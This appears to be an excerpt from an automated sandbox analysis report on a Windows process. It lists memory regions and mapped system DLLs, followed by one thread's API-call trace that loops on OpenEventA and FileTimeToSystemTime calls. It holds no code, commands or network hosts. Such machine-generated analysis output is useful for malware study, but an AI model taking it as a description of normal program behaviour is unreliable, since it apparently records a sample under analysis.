Region:
	              id = 1134
	        start_va = 0x2bb0000
	          end_va = 0x2bc6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002bb0000"
	        filename = ""

Region:
	              id = 1137
	        start_va = 0x2bb0000
	          end_va = 0x2bc6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002bb0000"
	        filename = ""

Region:
	              id = 1138
	        start_va = 0x2bb0000
	          end_va = 0x2bc6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002bb0000"
	        filename = ""

Region:
	              id = 1139
	        start_va = 0x2bb0000
	          end_va = 0x2bc6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002bb0000"
	        filename = ""

Region:
	              id = 1148
	        start_va = 0x2bb0000
	          end_va = 0x2bc6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002bb0000"
	        filename = ""

Region:
	              id = 1151
	        start_va = 0x2bb0000
	          end_va = 0x2bc6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002bb0000"
	        filename = ""

Region:
	              id = 1152
	        start_va = 0x2bb0000
	          end_va = 0x2bc6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002bb0000"
	        filename = ""

Region:
	              id = 1153
	        start_va = 0x2bb0000
	          end_va = 0x2bc6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002bb0000"
	        filename = ""

Region:
	              id = 1154
	        start_va = 0x6d0000
	          end_va = 0x6e6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000006d0000"
	        filename = ""

Region:
	              id = 1155
	        start_va = 0x721f0000
	          end_va = 0x724bafff
	     entry_point = 0x721f0000
	     region_type = mapped_file
	            name = "iertutil.dll"
	        filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll")

Region:
	              id = 1156
	        start_va = 0x6d0000
	          end_va = 0x6d0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000006d0000"
	        filename = ""

Region:
	              id = 1157
	        start_va = 0x76b60000
	          end_va = 0x76bf1fff
	     entry_point = 0x76b60000
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 1158
	        start_va = 0x6e0000
	          end_va = 0x6e0fff
	     entry_point = 0x6e0000
	     region_type = mapped_file
	            name = "counters.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat")

Region:
	              id = 1159
	        start_va = 0x70b90000
	          end_va = 0x70ba1fff
	     entry_point = 0x70b90000
	     region_type = mapped_file
	            name = "ondemandconnroutehelper.dll"
	        filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll")

Region:
	              id = 1160
	        start_va = 0x71d30000
	          end_va = 0x71d5efff
	     entry_point = 0x71d30000
	     region_type = mapped_file
	            name = "iphlpapi.dll"
	        filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll")

Region:
	              id = 1161
	        start_va = 0x6f0000
	          end_va = 0x706fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000006f0000"
	        filename = ""

Region:
	              id = 1162
	        start_va = 0x2370000
	          end_va = 0x23affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002370000"
	        filename = ""

Region:
	              id = 1163
	        start_va = 0x2bb0000
	          end_va = 0x2caffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002bb0000"
	        filename = ""

Region:
	              id = 1164
	        start_va = 0x6ff40000
	          end_va = 0x6ff52fff
	     entry_point = 0x6ff40000
	     region_type = mapped_file
	            name = "samlib.dll"
	        filename = "\\Windows\\SysWOW64\\samlib.dll" (normalized: "c:\\windows\\syswow64\\samlib.dll")

Region:
	              id = 1165
	        start_va = 0x6f0000
	          end_va = 0x6f3fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000006f0000"
	        filename = ""

Region:
	              id = 1166
	        start_va = 0x23b0000
	          end_va = 0x23c6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000023b0000"
	        filename = ""

Region:
	              id = 1167
	        start_va = 0x70200000
	          end_va = 0x70207fff
	     entry_point = 0x70200000
	     region_type = mapped_file
	            name = "winnsi.dll"
	        filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll")

Region:
	              id = 1168
	        start_va = 0x774b0000
	          end_va = 0x774b6fff
	     entry_point = 0x774b0000
	     region_type = mapped_file
	            name = "nsi.dll"
	        filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll")

Region:
	              id = 1169
	        start_va = 0x23b0000
	          end_va = 0x23effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000023b0000"
	        filename = ""

Region:
	              id = 1170
	        start_va = 0x23f0000
	          end_va = 0x242ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000023f0000"
	        filename = ""

Region:
	              id = 1171
	        start_va = 0x2430000
	          end_va = 0x2446fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002430000"
	        filename = ""

Region:
	              id = 1172
	        start_va = 0x2cb0000
	          end_va = 0x2daffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002cb0000"
	        filename = ""

Region:
	              id = 1173
	        start_va = 0x2db0000
	          end_va = 0x2eaffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002db0000"
	        filename = ""

Region:
	              id = 1174
	        start_va = 0x704c0000
	          end_va = 0x7063dfff
	     entry_point = 0x704c0000
	     region_type = mapped_file
	            name = "urlmon.dll"
	        filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll")

Region:
	              id = 1175
	        start_va = 0x71d60000
	          end_va = 0x71de3fff
	     entry_point = 0x71d60000
	     region_type = mapped_file
	            name = "dnsapi.dll"
	        filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll")

Region:
	              id = 1176
	        start_va = 0x700000
	          end_va = 0x700fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000700000"
	        filename = ""

Region:
	              id = 1177
	        start_va = 0x2430000
	          end_va = 0x246ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002430000"
	        filename = ""

Region:
	              id = 1178
	        start_va = 0x2eb0000
	          end_va = 0x2faffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002eb0000"
	        filename = ""

Region:
	              id = 1179
	        start_va = 0x2fb0000
	          end_va = 0x2fc6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002fb0000"
	        filename = ""

Region:
	              id = 1180
	        start_va = 0x2fb0000
	          end_va = 0x2fb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000002fb0000"
	        filename = ""

Region:
	              id = 1181
	        start_va = 0x77310000
	          end_va = 0x77393fff
	     entry_point = 0x77310000
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")

Region:
	              id = 1182
	        start_va = 0x2fc0000
	          end_va = 0x2fc0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000002fc0000"
	        filename = ""

Region:
	              id = 1183
	        start_va = 0x2fd0000
	          end_va = 0x2fe6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002fd0000"
	        filename = ""

Region:
	              id = 1184
	        start_va = 0x2fd0000
	          end_va = 0x300ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002fd0000"
	        filename = ""

Region:
	              id = 1185
	        start_va = 0x3010000
	          end_va = 0x310ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003010000"
	        filename = ""

Region:
	              id = 1186
	        start_va = 0x3110000
	          end_va = 0x314ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003110000"
	        filename = ""

Region:
	              id = 1187
	        start_va = 0x3150000
	          end_va = 0x324ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003150000"
	        filename = ""

Region:
	              id = 1188
	        start_va = 0x3250000
	          end_va = 0x3266fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003250000"
	        filename = ""

Region:
	              id = 1189
	        start_va = 0x3250000
	          end_va = 0x3266fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003250000"
	        filename = ""

Region:
	              id = 1192
	        start_va = 0x3250000
	          end_va = 0x328ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003250000"
	        filename = ""

Region:
	              id = 1193
	        start_va = 0x3290000
	          end_va = 0x338ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003290000"
	        filename = ""

Region:
	              id = 1194
	        start_va = 0x3390000
	          end_va = 0x33a6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003390000"
	        filename = ""

Region:
	              id = 1195
	        start_va = 0x71cd0000
	          end_va = 0x71d16fff
	     entry_point = 0x71cd0000
	     region_type = mapped_file
	            name = "fwpuclnt.dll"
	        filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll")

Region:
	              id = 1196
	        start_va = 0x74330000
	          end_va = 0x7434afff
	     entry_point = 0x74330000
	     region_type = mapped_file
	            name = "bcrypt.dll"
	        filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")

Region:
	              id = 1198
	        start_va = 0x3390000
	          end_va = 0x3391fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003390000"
	        filename = ""

Region:
	              id = 1199
	        start_va = 0x33a0000
	          end_va = 0x33a0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033a0000"
	        filename = ""

Region:
	              id = 1200
	        start_va = 0x33b0000
	          end_va = 0x37aafff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033b0000"
	        filename = ""

Region:
	              id = 1201
	        start_va = 0x37b0000
	          end_va = 0x37c6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000037b0000"
	        filename = ""

Region:
	              id = 1202
	        start_va = 0x71d20000
	          end_va = 0x71d27fff
	     entry_point = 0x71d20000
	     region_type = mapped_file
	            name = "rasadhlp.dll"
	        filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll")

Region:
	              id = 1203
	        start_va = 0x70120000
	          end_va = 0x70183fff
	     entry_point = 0x70120000
	     region_type = mapped_file
	            name = "schannel.dll"
	        filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll")

Region:
	              id = 1204
	        start_va = 0x77050000
	          end_va = 0x771c7fff
	     entry_point = 0x77050000
	     region_type = mapped_file
	            name = "crypt32.dll"
	        filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll")

Region:
	              id = 1205
	        start_va = 0x772d0000
	          end_va = 0x772ddfff
	     entry_point = 0x772d0000
	     region_type = mapped_file
	            name = "msasn1.dll"
	        filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll")

Region:
	              id = 1210
	        start_va = 0x37b0000
	          end_va = 0x37c6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000037b0000"
	        filename = ""

Region:
	              id = 1211
	        start_va = 0x37b0000
	          end_va = 0x37b0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000037b0000"
	        filename = ""

Region:
	              id = 1212
	        start_va = 0x37c0000
	          end_va = 0x37d6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000037c0000"
	        filename = ""

Region:
	              id = 1213
	        start_va = 0x37b0000
	          end_va = 0x37c6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000037b0000"
	        filename = ""

Region:
	              id = 1214
	        start_va = 0x700c0000
	          end_va = 0x700ebfff
	     entry_point = 0x700c0000
	     region_type = mapped_file
	            name = "ntasn1.dll"
	        filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll")

Region:
	              id = 1215
	        start_va = 0x700f0000
	          end_va = 0x7010ffff
	     entry_point = 0x700f0000
	     region_type = mapped_file
	            name = "ncrypt.dll"
	        filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll")

Region:
	              id = 1216
	        start_va = 0x70110000
	          end_va = 0x7011ffff
	     entry_point = 0x70110000
	     region_type = mapped_file
	            name = "mskeyprotect.dll"
	        filename = "\\Windows\\SysWOW64\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll")

Region:
	              id = 1218
	        start_va = 0x70090000
	          end_va = 0x70097fff
	     entry_point = 0x70090000
	     region_type = mapped_file
	            name = "dpapi.dll"
	        filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll")

Region:
	              id = 1219
	        start_va = 0x76c00000
	          end_va = 0x76c41fff
	     entry_point = 0x76c00000
	     region_type = mapped_file
	            name = "wintrust.dll"
	        filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll")

Region:
	              id = 1220
	        start_va = 0x70070000
	          end_va = 0x70082fff
	     entry_point = 0x70070000
	     region_type = mapped_file
	            name = "cryptsp.dll"
	        filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")

Region:
	              id = 1221
	        start_va = 0x70040000
	          end_va = 0x7006efff
	     entry_point = 0x70040000
	     region_type = mapped_file
	            name = "rsaenh.dll"
	        filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")

Region:
	              id = 1222
	        start_va = 0x37b0000
	          end_va = 0x37effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000037b0000"
	        filename = ""

Region:
	              id = 1223
	        start_va = 0x37f0000
	          end_va = 0x38effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000037f0000"
	        filename = ""

Region:
	              id = 1224
	        start_va = 0x38f0000
	          end_va = 0x3906fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000038f0000"
	        filename = ""

Region:
	              id = 1225
	        start_va = 0x38f0000
	          end_va = 0x39effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000038f0000"
	        filename = ""

Region:
	              id = 1226
	        start_va = 0x39f0000
	          end_va = 0x3a06fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000039f0000"
	        filename = ""

Region:
	              id = 1230
	        start_va = 0x6ff20000
	          end_va = 0x6ff3efff
	     entry_point = 0x6ff20000
	     region_type = mapped_file
	            name = "gpapi.dll"
	        filename = "\\Windows\\SysWOW64\\gpapi.dll" (normalized: "c:\\windows\\syswow64\\gpapi.dll")

Region:
	              id = 1231
	        start_va = 0x39f0000
	          end_va = 0x3a06fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000039f0000"
	        filename = ""

Region:
	              id = 1243
	        start_va = 0x39f0000
	          end_va = 0x3beffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000039f0000"
	        filename = ""

Region:
	              id = 1244
	        start_va = 0x3bf0000
	          end_va = 0x3c06fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003bf0000"
	        filename = ""

Region:
	              id = 1245
	        start_va = 0x700a0000
	          end_va = 0x700b9fff
	     entry_point = 0x700a0000
	     region_type = mapped_file
	            name = "ncryptsslp.dll"
	        filename = "\\Windows\\SysWOW64\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll")

Region:
	              id = 1248
	        start_va = 0x3bf0000
	          end_va = 0x3c06fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003bf0000"
	        filename = ""

Region:
	              id = 1253
	        start_va = 0x3bf0000
	          end_va = 0x3c06fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003bf0000"
	        filename = ""

Region:
	              id = 1256
	        start_va = 0x70190000
	          end_va = 0x701b7fff
	     entry_point = 0x70190000
	     region_type = mapped_file
	            name = "ntmarta.dll"
	        filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll")

Region:
	              id = 1257
	        start_va = 0x3bf0000
	          end_va = 0x3c06fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003bf0000"
	        filename = ""

Region:
	              id = 1260
	        start_va = 0x7fb00000
	          end_va = 0x7fea0fff
	     entry_point = 0x7fb00000
	     region_type = mapped_file
	            name = "sysmain.sdb"
	        filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb")

Region:
	              id = 1276
	        start_va = 0x3bf0000
	          end_va = 0x3c07fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003bf0000"
	        filename = ""

Region:
	              id = 1374
	        start_va = 0x3bf0000
	          end_va = 0x3c07fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003bf0000"
	        filename = ""

Region:
	              id = 1417
	        start_va = 0x3bf0000
	          end_va = 0x3c07fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003bf0000"
	        filename = ""


Thread:
	id = 43
	os_tid = 0xda8

	[0061.167] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="foaphmnbh") returned 0x0
	[0061.167] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="foaphmnbh") returned 0x0
	[0061.167] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.168] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.168] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.168] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.168] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.168] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.168] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.168] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.168] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.168] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.168] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.168] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.168] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.168] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.168] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.168] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.168] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.168] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.168] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.168] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.168] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.168] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.168] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.168] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.168] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.168] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.169] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.169] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.169] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.169] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.169] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.169] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.169] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.169] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.169] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.169] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.169] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.169] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.169] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.169] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.169] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.169] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.169] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.169] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.169] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.169] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.169] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.169] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.169] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.169] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.170] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.170] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.170] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.170] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.170] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.170] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.170] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.170] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.170] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.170] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.170] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.170] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.170] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.170] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.170] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.170] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.170] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.170] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.170] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.170] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.170] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.170] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.170] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.170] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.170] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.170] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.170] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.170] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.170] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.170] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.170] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.171] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.171] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.171] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.171] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.171] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.171] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.171] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.171] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.171] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.171] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.171] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.171] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0061.171] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0061.171] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
